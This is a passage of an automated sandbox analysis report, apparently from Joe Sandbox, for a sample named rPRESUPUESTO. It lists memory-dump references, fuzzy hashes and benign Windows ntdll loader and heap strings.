                                                • SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 01843456
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
                                                • API String ID: 0-1245972979
                                                Strings
                                                • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 01830FE5
                                                • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 01831028
                                                • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 018310AE
                                                • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 0183106B
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                • API String ID: 0-1468400865
                                                Strings
                                                • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 0183A992
                                                • LdrpDynamicShimModule, xrefs: 0183A998
                                                • apphelp.dll, xrefs: 017F2462
                                                • minkernel\ntdll\ldrinit.c, xrefs: 0183A9A2
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                • API String ID: 0-176724104
                                                Strings
                                                • HEAP[%wZ]: , xrefs: 017E3255
                                                • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 017E327D
                                                • HEAP: , xrefs: 017E3264
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                                • API String ID: 0-617086771
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                • API String ID: 0-4253913091
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: $@
                                                • API String ID: 0-1077428164
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: FilterFullPath$UseFilter$\??\
                                                • API String ID: 0-2779062949
                                                Strings
                                                • Failed to allocated memory for shimmed module list, xrefs: 0183A10F
                                                • minkernel\ntdll\ldrinit.c, xrefs: 0183A121
                                                • LdrpCheckModule, xrefs: 0183A117
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                • API String ID: 0-161242083
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                                • API String ID: 0-1334570610
                                                Strings
                                                • Failed to reallocate the system dirs string !, xrefs: 018482D7
                                                • minkernel\ntdll\ldrinit.c, xrefs: 018482E8
                                                • LdrpInitializePerUserWindowsDirectory, xrefs: 018482DE
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                • API String ID: 0-1783798831
                                                Strings
                                                • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 0188C1C5
                                                • @, xrefs: 0188C1F1
                                                • PreferredUILanguages, xrefs: 0188C212
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                • API String ID: 0-2968386058
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                • API String ID: 0-1373925480
                                                Strings
                                                • LdrpCheckRedirection, xrefs: 0185488F
                                                • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 01854888
                                                • minkernel\ntdll\ldrredirect.c, xrefs: 01854899
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                • API String ID: 0-3154609507
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                                • API String ID: 0-2558761708
                                                Strings
                                                • minkernel\ntdll\ldrinit.c, xrefs: 01852104
                                                • LdrpInitializationFailure, xrefs: 018520FA
                                                • Process initialization failed with status 0x%08lx, xrefs: 018520F3
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                • API String ID: 0-2986994758
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID: ___swprintf_l
                                                • String ID: #%u
                                                • API String ID: 48624451-232158463
                                                Strings
                                                • LdrResSearchResource Enter, xrefs: 017DAA13
                                                • LdrResSearchResource Exit, xrefs: 017DAA25
                                                • API ID:
                                                • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                                                • API String ID: 0-4066393604
                                                Strings
                                                • API ID:
                                                • String ID: `$`
                                                • API String ID: 0-197956300
                                                Strings
                                                • API ID: InitializeThunk
                                                • String ID: Legacy$UEFI
                                                • API String ID: 2994545307-634100481
                                                Strings
                                                • API ID:
                                                • String ID: @$MUI
                                                • API String ID: 0-17815947
                                                Strings
                                                • kLsE, xrefs: 017D0540
                                                • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 017D063D
                                                • API ID:
                                                • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                • API String ID: 0-2547482624
                                                Strings
                                                • RtlpResUltimateFallbackInfo Exit, xrefs: 017DA309
                                                • RtlpResUltimateFallbackInfo Enter, xrefs: 017DA2FB
                                                • API ID:
                                                • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                • API String ID: 0-2876891731
                                                Strings
                                                • API ID: InitializeThunk
                                                • String ID: Cleanup Group$Threadpool!
                                                • API String ID: 2994545307-4008356553
                                                Strings
                                                • API ID:
                                                • String ID: MUI
                                                • API String ID: 0-1339004836
                                                Strings
                                                • API ID:
                                                • String ID: GlobalTags
                                                • API String ID: 0-1106856819
                                                Strings
                                                • API ID:
                                                • String ID: .mui
                                                • API String ID: 0-1199573805
                                                Strings
                                                • API ID:
                                                • String ID: EXT-
                                                • API String ID: 0-1948896318
                                                Strings
                                                • API ID:
                                                • String ID: BinaryHash
                                                • API String ID: 0-2202222882
                                                Strings
                                                • API ID:
                                                • String ID: #
                                                • API String ID: 0-1885708031
                                                Strings
                                                • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 0185895E
                                                • API ID:
                                                • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                                                • API String ID: 0-702105204
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 36da6d339d4e427fdff6d0cc1ef1fc2143b3e18b953597a3cb9502ce78f00876
                                                • Instruction ID: 18365b1ebacd7e5dd220bc918e135984e7cc4d05faf0959af248093ec1291f3a
                                                • Opcode Fuzzy Hash: 36da6d339d4e427fdff6d0cc1ef1fc2143b3e18b953597a3cb9502ce78f00876
                                                • Instruction Fuzzy Hash: 82C167702083458FE764CF19C484BAAFBF4BF88704F54496DE98987291D774EA09CFA2
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: e14083a4fb5b7d13dad46c1656da26fd2f13244966bf91f2c064d552c40f7b0a
                                                • Instruction ID: 86087506c86a622330d0c9febecc5f106f7a1bb021d4fc7dc52a0895c8b5b086
                                                • Opcode Fuzzy Hash: e14083a4fb5b7d13dad46c1656da26fd2f13244966bf91f2c064d552c40f7b0a
                                                • Instruction Fuzzy Hash: 4CB17F70A002668BDB25CF68D980BA9F3B5EF54700F2485EDD50EE7285EB349EC5CB21
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: bf86a121d994855ae247617a135414f15eea5dfa5dd7ebd0c0b4975c78b2f34e
                                                • Instruction ID: 97a2290bad565616285fd6678599801bb5b8225cba0f17710fb8972e717bae67
                                                • Opcode Fuzzy Hash: bf86a121d994855ae247617a135414f15eea5dfa5dd7ebd0c0b4975c78b2f34e
                                                • Instruction Fuzzy Hash: F8A11831E006599FEB21DB5CC844BAEBBB4AB40714F090165EB10EB3A1DB749E41CBD2
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: b5129d4fca98a2ed4cf939b30bde5d6a812561fef275836283330765f94286a9
                                                • Instruction ID: 40a9243046416f222c097272e7cb77c7c18f3663288482f88b3cc5525b54d707
                                                • Opcode Fuzzy Hash: b5129d4fca98a2ed4cf939b30bde5d6a812561fef275836283330765f94286a9
                                                • Instruction Fuzzy Hash: C2A1D372B0061A9FDB25CF69C9D0BAAB7B9FF54318F104029FA45D7285DB34EA41CB50
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: eaeb634986763bc1b0e4cdf092d7ca11eee63cfd97dedf64860175162e3085d0
                                                • Instruction ID: ce84cf324f8d555102192e0b73578581b4cd8c179583c5d48603678328529fb3
                                                • Opcode Fuzzy Hash: eaeb634986763bc1b0e4cdf092d7ca11eee63cfd97dedf64860175162e3085d0
                                                • Instruction Fuzzy Hash: 2DA1EF72A00242DFEB21DF18C984B2ABBE9FF58704F990528F585DB651D3B4EE00CB91
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 6ce3715ed4799cd0a993ea830d382c3077ea0590534c70b07cf682ff4d409637
                                                • Instruction ID: b6ebcf763efb3c72d32ca3cfbab3b0252f41903e3b1e8adc8694c9bfacc639c3
                                                • Opcode Fuzzy Hash: 6ce3715ed4799cd0a993ea830d382c3077ea0590534c70b07cf682ff4d409637
                                                • Instruction Fuzzy Hash: DFB15A71E0061ADFEF25CFA9C880AADB7B6FF48314F548129E914E7355D730AA51CB90
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: d4d473efb40651fe549d3e3b73c15c42182171298fbaec207a3e0b31ef2f5f9c
                                                • Instruction ID: cd12a194a9f9226c4bf0d312e1c6c7fc9cd457d32586e72e0e702e8c6a573745
                                                • Opcode Fuzzy Hash: d4d473efb40651fe549d3e3b73c15c42182171298fbaec207a3e0b31ef2f5f9c
                                                • Instruction Fuzzy Hash: D5919471D0021AAFDF55CF68D884BBEBBB5EB48750F654159EA10EB341E734DA009BA0
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: c15c8e83720f5dbf422feb7b1407cb6436200bf5869771a7af0f0e012e87e4b4
                                                • Instruction ID: a7e407f526d666384c5835ab27ff49610f6cbd2c098acdda0b1b6279ffab02db
                                                • Opcode Fuzzy Hash: c15c8e83720f5dbf422feb7b1407cb6436200bf5869771a7af0f0e012e87e4b4
                                                • Instruction Fuzzy Hash: 8E913531A00216CBEB24DB18C888B7AFBE1EF89714F2944A9ED05DB345FA74DA41C791
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 9b65fb5007be16ff03545c9e482012b84f9608858798499b9ba20128251d746e
                                                • Instruction ID: 11b52798193e29948634bca4696d4f48afe249948be6df99780d11b63f4c07c1
                                                • Opcode Fuzzy Hash: 9b65fb5007be16ff03545c9e482012b84f9608858798499b9ba20128251d746e
                                                • Instruction Fuzzy Hash: 678194B1E006299FDB19DF69C940ABEBBF9FB48700F14852EE855D7640E334DA80CB94
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
                                                • Instruction ID: f37dab843d5609bf2e0dac9940d0d752c9ef1b7a5705ad005542342f6d97cf24
                                                • Opcode Fuzzy Hash: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
                                                • Instruction Fuzzy Hash: D6817071A0025A9FDF19CF9DC880AAEBBF2BF84314F188569D916DB384D734EA41CB50
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 3e3d691b349f0dbb02c636e623cea4bf96b567319a6b0657c3e9758b03e25e58
                                                • Instruction ID: 620e856ec0294b9832d402eb1925ac8924f253b6d05db72915451dc5aaff4ac0
                                                • Opcode Fuzzy Hash: 3e3d691b349f0dbb02c636e623cea4bf96b567319a6b0657c3e9758b03e25e58
                                                • Instruction Fuzzy Hash: 60814E7190060DAFDB66CFA9C880AEBBBFAFF48354F114829E555E7250DB30AE45CB50
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 31723899490cb4c2f84a26e19ba489648851c47e83b4b460a8367bbea5ab5aea
                                                • Instruction ID: eeef00a619eb9bb89d672f3fa716ddd9cdae977b5832abca946f8fd289124bed
                                                • Opcode Fuzzy Hash: 31723899490cb4c2f84a26e19ba489648851c47e83b4b460a8367bbea5ab5aea
                                                • Instruction Fuzzy Hash: 2771BFB99046659FCB268F59D5947FEFBF0FF89710F18425AE942AB350D3349A00CBA0
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 52c4467fec5272a0f6246730e97c0e970237a8302e2c02bfce6dd77c873663aa
                                                • Instruction ID: 175581f59f3242c82c9959b17a5a2304c0ef6bfcffb2c7cb1f6765918d81c3ff
                                                • Opcode Fuzzy Hash: 52c4467fec5272a0f6246730e97c0e970237a8302e2c02bfce6dd77c873663aa
                                                • Instruction Fuzzy Hash: 00716072900206EFDB20EF99D944A9AFBF9EF94700B25416AE710DB359E7328B44CF54
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 5cbfcce2f491509af8d7c4c0ee1da43550bffde3d704447ba20088417c7d80a3
                                                • Instruction ID: 27933cfe7adc004bd68bae6580258f487970a4de47c27a90f0f595245b794f73
                                                • Opcode Fuzzy Hash: 5cbfcce2f491509af8d7c4c0ee1da43550bffde3d704447ba20088417c7d80a3
                                                • Instruction Fuzzy Hash: 3871D0716042429FD312DF2CC488B2AF7E9FF88310F0885AAE999CB756DB34D945CB91
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
                                                • Instruction ID: 6ff42e4badd8da84e7e365947a4b9af2b70a769a5b43a4b0bcb32b105af5e3fa
                                                • Opcode Fuzzy Hash: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
                                                • Instruction Fuzzy Hash: 28716E71A00619EFDB10DFA9C984E9EBBF9FF48704F104569E905EB250DB34EA41CB50
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 2fcebc1bba3f079980b90727a05c96f8d0a34b011ee6d193e0bbcd7559efe455
                                                • Instruction ID: b958c35d827b0fcabdc021b8f85337427885ffa17ae5e892c10574e3e00ceace
                                                • Opcode Fuzzy Hash: 2fcebc1bba3f079980b90727a05c96f8d0a34b011ee6d193e0bbcd7559efe455
                                                • Instruction Fuzzy Hash: 2C71F432200745AFEB328F18C984F56BBEAFF44764F244518E256CB2A1EB75EA44CB50
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 9013c4a34e6e9dfc6fa2f9098a24d3348bd10134e96c9e1008e33fbcf33f3498
                                                • Instruction ID: 9c69786b30320767d0e12917abbcc79e2f09f6e1c2dbb1f28fcb27687a0e5a37
                                                • Opcode Fuzzy Hash: 9013c4a34e6e9dfc6fa2f9098a24d3348bd10134e96c9e1008e33fbcf33f3498
                                                • Instruction Fuzzy Hash: E481AD72A1431A8FDB25CF9CD894BADB7B2BF88314F19416DD900AB295C7749E81CB90
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 8b1b9afacbc79536d5e7e3b73e5682c848d6b619cafa57fa116dee32532ffa4f
                                                • Instruction ID: 59d0b9afeec21dd7cb311191bca696db8dfdee07a711f87e5bd5ea9054577f8b
                                                • Opcode Fuzzy Hash: 8b1b9afacbc79536d5e7e3b73e5682c848d6b619cafa57fa116dee32532ffa4f
                                                • Instruction Fuzzy Hash: 0B713C72E00209AFEF15DF94C881FEEBBB9FB05351F504119EA10E7290D774AA05CBA1
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a4d4f5a486007bdbbe16f5fe8d447cf05a57e4acab38c28a11b3139ff3b4c389
                                                • Instruction ID: 9621fbf05f998e0352de289fede7a4bf9a7e7ceafcf609fbaadfb5d52ab8fc8a
                                                • Opcode Fuzzy Hash: a4d4f5a486007bdbbe16f5fe8d447cf05a57e4acab38c28a11b3139ff3b4c389
                                                • Instruction Fuzzy Hash: BA51C172505716AFD726EE6CC884E5BB7E8EBC5B54F00092ABA40DB190D770EE04C7A3
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 92365fc8abfb938715dc04d1ab83aa398fcccdc086e1dd0ff14098e5a2414975
                                                • Instruction ID: ff06bb3f11335c26f3437d69f90a728f0fe6bb212612e763769eab8783a7da7e
                                                • Opcode Fuzzy Hash: 92365fc8abfb938715dc04d1ab83aa398fcccdc086e1dd0ff14098e5a2414975
                                                • Instruction Fuzzy Hash: 2B51CE70900709DFD721CF6AC888A6BFBF8BF95714F10461EE292976A1C7B0E645CB90
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 39697ce04fe6f0a2f6dca0379454e0446edd50bab1f73d58f7bbdc20ac05dee0
                                                • Instruction ID: df16e4ccd35df26eb6082cce893794373b8e4f0dda9ec394ffd0a1f01c6593cd
                                                • Opcode Fuzzy Hash: 39697ce04fe6f0a2f6dca0379454e0446edd50bab1f73d58f7bbdc20ac05dee0
                                                • Instruction Fuzzy Hash: AE516B71600A09DFCB22EF69C984E6BB3F9FF58744F41086AE552D72A0DB35EA50CB50
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a898abb720b5eb5fd7551334d55179a84d87eb89b37613489b0af63e628b5da4
                                                • Instruction ID: 4d152a1358d201efaf05045125c4c7fb1d5b69bfcf1f1f6b7c3753febab6c266
                                                • Opcode Fuzzy Hash: a898abb720b5eb5fd7551334d55179a84d87eb89b37613489b0af63e628b5da4
                                                • Instruction Fuzzy Hash: CF5146726083468FD754DF29C881A6BBBE5BFC8308F44492DF599C7250EB30DA05CB52
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
